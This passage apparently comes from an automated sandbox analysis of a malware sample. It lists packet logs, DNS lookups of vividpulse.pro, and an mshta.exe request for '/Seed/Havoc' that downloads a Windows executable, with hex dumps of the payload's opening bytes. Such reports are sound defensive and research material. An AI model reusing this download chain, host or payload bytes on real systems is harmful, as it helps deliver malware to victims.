                                          Dec 31, 2024 10:38:09.575278997 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.575297117 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.575352907 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.575381994 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.575390100 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.575418949 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.575486898 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.575508118 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.575541019 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.575547934 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.575567961 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.575591087 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.575731039 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.575756073 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.575812101 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.575819016 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.575902939 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.575970888 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.575987101 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.576035976 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.576042891 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.576072931 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.576128006 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.576204062 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.576219082 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.576261044 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.576267958 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.576297998 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.576308966 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.660680056 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.660701990 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.660778999 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.660792112 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.660845995 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.661035061 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.661051989 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.661093950 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.661099911 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.661134005 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.661151886 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.662880898 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.662899017 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.662962914 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.662970066 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.663012028 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.663027048 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.665900946 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.665918112 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.665971994 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.666007042 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.666017056 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.666033030 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.666059017 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.666095018 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.666280985 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.666300058 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.666342974 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.666349888 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.666367054 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.666564941 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.666584969 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.666625977 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.666634083 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.666652918 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.708950043 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.708967924 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.709054947 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.709073067 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.709103107 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.709121943 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.750881910 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.750905991 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.750962973 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.750974894 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.751043081 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.751228094 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.751250029 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.751290083 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.751297951 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.751328945 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.753400087 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.753421068 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.753468037 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.753478050 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.753499985 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.756288052 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.756304979 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.756356001 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.756366014 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.756371975 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.756472111 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.756494045 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.756526947 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.756534100 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.756560087 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.756835938 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.756850004 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.756896973 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.756907940 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.757016897 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.757035971 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.757074118 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.757080078 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.757102013 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.797919035 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.799551010 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.799567938 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.799648046 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.799655914 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.799813986 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.841407061 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.841424942 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.841487885 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.841497898 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.841538906 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.841562986 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.841799021 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.841814995 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.841864109 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.841871977 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.841901064 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.841911077 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.844172955 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.844188929 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.844270945 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.844284058 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.844388962 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.846860886 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.846877098 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.846932888 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.846940041 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.846959114 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.846995115 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.847016096 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.847024918 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.847050905 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.847075939 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.847282887 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.847292900 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.847351074 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.847357988 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.847397089 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.847449064 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.847453117 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.847781897 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.848010063 CET49743443192.168.2.692.113.18.193

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 31, 2024 10:38:02.040038109 CET5119453192.168.2.61.1.1.1
                                          Dec 31, 2024 10:38:02.079327106 CET53511941.1.1.1192.168.2.6
                                          Dec 31, 2024 10:38:16.592427015 CET6099053192.168.2.61.1.1.1

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Dec 31, 2024 10:38:02.040038109 CET192.168.2.61.1.1.10x7020Standard query (0)vividpulse.proA (IP address)IN (0x0001)false
                                          Dec 31, 2024 10:38:16.592427015 CET192.168.2.61.1.1.10x7c1cStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 31, 2024 10:38:02.079327106 CET1.1.1.1192.168.2.60x7020No error (0)vividpulse.pro92.113.18.193A (IP address)IN (0x0001)false
                                          Dec 31, 2024 10:38:16.604393005 CET1.1.1.1192.168.2.60x7c1cNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                          Dec 31, 2024 10:38:17.353905916 CET1.1.1.1192.168.2.60xbed1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                          Dec 31, 2024 10:38:17.353905916 CET1.1.1.1192.168.2.60xbed1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                          Dec 31, 2024 10:38:32.888923883 CET1.1.1.1192.168.2.60x82c6No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                          Dec 31, 2024 10:38:32.888923883 CET1.1.1.1192.168.2.60x82c6No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                          Dec 31, 2024 10:38:44.987284899 CET1.1.1.1192.168.2.60xf065No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                          Dec 31, 2024 10:38:44.987284899 CET1.1.1.1192.168.2.60xf065No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                          Dec 31, 2024 10:39:09.049134970 CET1.1.1.1192.168.2.60x861No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                          Dec 31, 2024 10:39:09.049134970 CET1.1.1.1192.168.2.60x861No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                          Dec 31, 2024 10:39:33.112658024 CET1.1.1.1192.168.2.60x2bcdNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                          Dec 31, 2024 10:39:33.112658024 CET1.1.1.1192.168.2.60x2bcdNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                          Dec 31, 2024 10:39:57.220911026 CET1.1.1.1192.168.2.60x9babNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                          Dec 31, 2024 10:39:57.220911026 CET1.1.1.1192.168.2.60x9babNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • vividpulse.pro

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.64971192.113.18.1934434372C:\Windows\System32\mshta.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-31 09:38:03 UTC328OUTGET /Seed/Havoc HTTP/1.1
                                          Accept: */*
                                          Accept-Language: en-CH
                                          UA-CPU: AMD64
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                          Host: vividpulse.pro
                                          Connection: Keep-Alive
                                          2024-12-31 09:38:03 UTC575INHTTP/1.1 200 OK
                                          Connection: close
                                          cache-control: public, max-age=604800
                                          expires: Tue, 07 Jan 2025 09:38:03 GMT
                                          last-modified: Mon, 30 Dec 2024 12:27:14 GMT
                                          etag: "70cd3-677291a2-bc38a2d59ab89e42;;;"
                                          accept-ranges: bytes
                                          content-length: 462035
                                          date: Tue, 31 Dec 2024 09:38:03 GMT
                                          server: LiteSpeed
                                          platform: hostinger
                                          panel: hpanel
                                          content-security-policy: upgrade-insecure-requests
                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                          2024-12-31 09:38:03 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a0 52 e6 d8 e4 33 88 8b e4 33 88 8b e4 33 88 8b 00 43 8b 8a e7 33 88 8b 00 43 8c 8a fc 33 88 8b 00 43 8d 8a e3 33 88 8b 00 43 89 8a f9 33 88 8b e4 33 89 8b cd 32 88 8b 00 43 80 8a f0 33 88 8b 00 43 77 8b e5 33 88 8b 00 43 8a 8a e5 33 88 8b 52 69 63 68 e4 33 88 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 fd b9 f0 9e 00 00 00
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$R333C3C3C3C332C3Cw3C3Rich3PEL
                                          2024-12-31 09:38:03 UTC16384INData Raw: cc cc cc 8b ff 55 8b ec 51 8b 45 08 53 56 8b f1 57 89 86 a4 00 00 00 8b 45 0c 89 86 a8 00 00 00 ff 15 94 21 41 00 ff 75 18 8b 86 a4 00 00 00 33 db 53 53 53 ff 70 04 8b ce ff 15 a4 21 41 00 8b f8 85 ff 0f 88 ce 00 00 00 6a 01 8b ce ff 15 94 20 41 00 8b f8 85 ff 0f 88 ba 00 00 00 6a 01 8b ce ff 15 98 20 41 00 8b f8 85 ff 0f 88 a6 00 00 00 8b 8e a4 00 00 00 56 ff 15 48 21 41 00 6a 01 8b ce ff 15 24 21 41 00 8d 45 fc 50 ff 15 bc 20 41 00 8b f8 85 ff 78 7f ff 75 fc 8b ce ff 15 9c 20 41 00 8b f8 85 ff 79 0b 8b 4d fc ff 15 c0 20 41 00 eb 63 6a 10 bf 05 40 00 80 e8 c3 9c 00 00 8b d0 59 85 d2 74 14 8b 8e a4 00 00 00 8b 49 04 89 5a 04 89 5a 08 89 4a 0c eb 02 8b d3 89 96 ac 00 00 00 85 d2 74 30 53 8d 45 fc 8b ca 50 0f b7 45 10 53 56 68 90 16 40 00 50 ff b6 a8 00 00
                                          Data Ascii: UQESVWE!Au3SSSp!Aj Aj AVH!Aj$!AEP Axu AyM Acj@YtIZZJt0SEPESVh@P
                                          2024-12-31 09:38:03 UTC16384INData Raw: 10 6a 2d 59 e8 3e de ff ff ff b5 dc fd ff ff ff 15 6c 22 41 00 83 f8 ff 74 37 6a 0e 68 e8 21 40 00 8b cb e8 72 04 00 00 ff b5 dc fd ff ff ff 15 68 22 41 00 a1 38 10 41 00 3b c7 74 14 f6 40 1c 10 74 0e ff 70 14 ff 70 10 6a 2e 59 e8 f6 dd ff ff 8b 8d dc fd ff ff 33 ff 8d 49 f0 e8 6a b4 ff ff 8b 8d d8 fd ff ff 8d 49 f0 e8 5c b4 ff ff 8b 8d d4 fd ff ff 8d 49 f0 e8 4e b4 ff ff 83 bd c4 fd ff ff 00 74 0c ff b5 c4 fd ff ff ff 15 64 20 41 00 8d 4e f0 e8 31 b4 ff ff 8d 8d ac fd ff ff e8 b7 05 00 00 8b c7 e8 06 6b 00 00 c2 0c 00 cc cc cc cc cc cc 6a 00 b8 ac fd 40 00 e8 1b 6b 00 00 8b 45 08 85 c0 74 38 8b 00 ba 08 22 40 00 66 8b 30 33 c9 41 66 3b 32 75 1e 66 85 f6 74 15 66 8b 70 02 66 3b 72 02 75 0f 83 c0 04 83 c2 04 66 85 f6 75 db 33 c0 eb 04 1b c0 0b c1 85 c0 74
                                          Data Ascii: j-Y>l"At7jh!@rh"A8A;t@tppj.Y3IjI\INtd AN1kj@kEt8"@f03Af;2uftfpf;rufu3t
                                          2024-12-31 09:38:03 UTC16384INData Raw: dd 85 c0 fe ff ff dc 4d b0 de c1 d9 18 d9 85 1c ff ff ff d9 58 04 d9 85 18 ff ff ff d9 58 08 d9 85 14 ff ff ff d9 58 0c d9 85 10 ff ff ff d9 58 10 d9 85 0c ff ff ff d9 58 14 d9 85 08 ff ff ff d9 58 18 d9 85 e0 fe ff ff d9 58 1c d9 85 04 ff ff ff d9 58 20 d9 85 00 ff ff ff d9 58 24 d9 85 fc fe ff ff d9 58 28 d9 85 f8 fe ff ff d9 58 2c d9 85 f4 fe ff ff d9 58 30 d9 85 f0 fe ff ff d9 58 34 d9 85 ec fe ff ff d9 58 38 d9 85 e4 fe ff ff d9 58 3c d9 85 e8 fe ff ff d9 58 40 d9 85 d0 fe ff ff d9 58 44 d9 85 d4 fe ff ff d9 58 48 d9 85 d8 fe ff ff d9 58 4c d9 85 dc fe ff ff d9 58 50 d9 45 f4 d9 58 54 d9 45 ec d9 58 58 d9 45 e4 d9 58 5c d9 45 fc d9 58 60 c9 c2 04 00 cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 60 d9 42 04 d8 05 44 16 41 00 8b 45 08 d9 5d fc d9 42 08 d8 05
                                          Data Ascii: MXXXXXXXX X$X(X,X0X4X8X<X@XDXHXLXPEXTEXXEX\EX`U`BDAE]B
                                          2024-12-31 09:38:03 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 40 1c 41 00 40 16 40 00 48 16 40 00 38 10 41 00 00 00 00 00 84 28 40 00 32 00 00 00 33 00 00 00 02 00 00 00 18 00 00 00 00 00 00 00 9c 28 40 00 42 00 00 00 43 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 b8 28 40 00 36 00 00 00 37 00 00 00 02 00 00 00 1c 00 00 00 00 00 00 00 cc 28 40 00 40 00 00 00 41 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 e4 28 40 00 3a 00 00 00 3b 00 00 00 02 00 00 00 08 00 00 00 00 00 00 00 fc 28 40 00 34 00 00 00 35 00 00 00 02 00 00 00 08 00 00 00 00 00 00 00 14 29 40 00 10 20 00 00 11 20 00 00 01 00 00 00 00 00 00 00 00 00 00 00 38 29 40 00 0e 20 00 00 0f 20 00 00 01 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: @A@@H@8A(@23(@BC(@67(@@A0(@:;(@45)@ 8)@
                                          2024-12-31 09:38:03 UTC16384INData Raw: 4d 00 55 00 49 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 10 00 00 00 65 00 6e 00 2d 00 55 00 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: MUIen-US
                                          2024-12-31 09:38:03 UTC16384INData Raw: 68 ff ff ff e8 dd 02 00 00 8b 45 1c 8b 8d dc fe ff ff 89 85 3c ff ff ff 8d 85 2c ff ff ff 50 89 9d 40 ff ff ff 89 b5 44 ff ff ff 89 9d 48 ff ff ff e8 b0 02 00 00 8b 45 14 89 85 1c ff ff ff 89 9d 20 ff ff ff 89 b5 24 ff ff ff 89 9d 28 ff ff ff 8b 45 10 89 9d 10 ff ff ff c7 85 14 ff ff ff 08 00 00 00 89 9d 18 ff ff ff 8b 00 89 85 0c ff ff ff 8d 85 ec fe ff ff 50 6a 11 53 53 ff b5 d8 fe ff ff ff b5 d4 fe ff ff e8 a3 fd ff ff 8b 4d fc 5f 5e 33 cd 5b e8 65 b0 00 00 c9 c2 44 00 cc cc cc cc cc cc 8b ff 55 8b ec 81 ec 60 01 00 00 a1 04 13 41 00 33 c5 89 45 fc 8b 45 18 89 85 a8 fe ff ff 8b 45 20 89 85 ac fe ff ff 8b 45 28 53 8b 5d 3c 89 85 b0 fe ff ff 8b 45 30 56 8b 75 48 89 85 b4 fe ff ff 8b 45 38 57 8b 7d 44 89 85 b8 fe ff ff 8d 45 ec 89 8d a0 fe ff ff 8b 4d 54
                                          Data Ascii: hE<,P@DHE $(EPjSSM_^3[eDU`A3EEE E(S]<E0VuHE8W}DEMT
                                          2024-12-31 09:38:03 UTC16384INData Raw: f0 e8 b1 cc ff ff 8d 57 48 c6 45 fc 01 8d 4d f0 e8 50 02 00 00 8b ce ba 20 14 41 00 f7 d9 1b c9 81 c1 02 00 00 80 85 f6 75 05 ba a0 13 41 00 8b 75 f0 56 68 58 13 41 00 e8 4f fe ff ff 8d 4e f0 c6 45 fc 00 e8 82 c4 ff ff 8b 75 e8 85 f6 74 42 68 78 12 41 00 8d 4d f0 e8 5a cc ff ff c6 45 fc 02 84 db 74 03 83 c7 18 8b d7 8d 4d f0 e8 f3 01 00 00 8b 75 f0 ba 20 14 41 00 56 68 84 13 41 00 b9 01 00 00 80 e8 02 fe ff ff 8d 4e f0 e8 39 c4 ff ff 8b 75 ec 8d 4d e0 e8 f0 24 00 00 8b c6 e8 f4 7a 00 00 c3 cc cc cc cc cc cc 6a 1c b8 eb fb 40 00 e8 25 7b 00 00 8b f9 33 db 8d 4d e4 53 68 90 1f 40 00 89 5d ec e8 79 24 00 00 89 5d fc 89 5d d8 89 5d dc 89 5d e0 8d 4d f0 c6 45 fc 01 e8 53 67 00 00 68 06 00 02 00 8d 4d d8 ff 30 68 02 00 00 80 e8 53 e8 ff ff 8b 4d f0 8b f0 83 c1
                                          Data Ascii: WHEMP AuAuVhXAONEutBhxAMZEtMu AVhAN9uM$zj@%{3MSh@]y$]]]]MESghM0hSM
                                          2024-12-31 09:38:03 UTC16384INData Raw: 3b d0 74 10 66 89 3a 03 d7 3b d0 75 f7 8b 56 10 85 d2 74 60 85 db 8b fa 8b 5d 08 74 2c 0f b7 46 14 6b c8 2c 03 ca 3b d1 74 1f 8b 7e 0c 83 c2 08 39 7a fc 76 07 8b 02 3b 43 08 74 38 83 c2 2c 8d 42 f8 3b c1 75 ea 8b 7e 10 0f b7 46 16 33 d2 0f b7 4e 14 40 f7 f1 0f b7 c2 33 d2 6b c8 2c 42 66 89 46 16 8b 46 08 03 cf f0 0f c1 10 42 52 53 e8 b4 fd ff ff 5f 5e 5b 5d c2 04 00 cc cc cc cc cc cc 8b ff 55 8b ec 51 53 56 8b 35 ec 1c 41 00 33 db 57 8b fb 85 f6 74 51 39 5e 04 75 1c 8b 0e 8d 55 fc 89 5d fc e8 87 15 00 00 85 c0 78 0b 39 5e 04 75 06 8b 45 fc 89 46 04 8b 76 04 8d 46 10 f7 de 1b f6 23 f0 74 22 ff 15 e0 22 41 00 6a 0a 59 33 d2 8b f8 f7 f1 8b 4c 96 08 eb 07 39 39 74 10 8b 49 04 85 c9 75 f5 8b fb 8b c7 5f 5e 5b c9 c3 83 c1 08 8b f9 74 f2 39 59 08 75 ed 8d 46 04
                                          Data Ascii: ;tf:;uVt`]t,Fk,;t~9zv;Ct8,B;u~F3N@3k,BfFFBRS_^[]UQSV5A3WtQ9^uU]x9^uEFvF#t""AjY3L99tIu_^[t9YuF
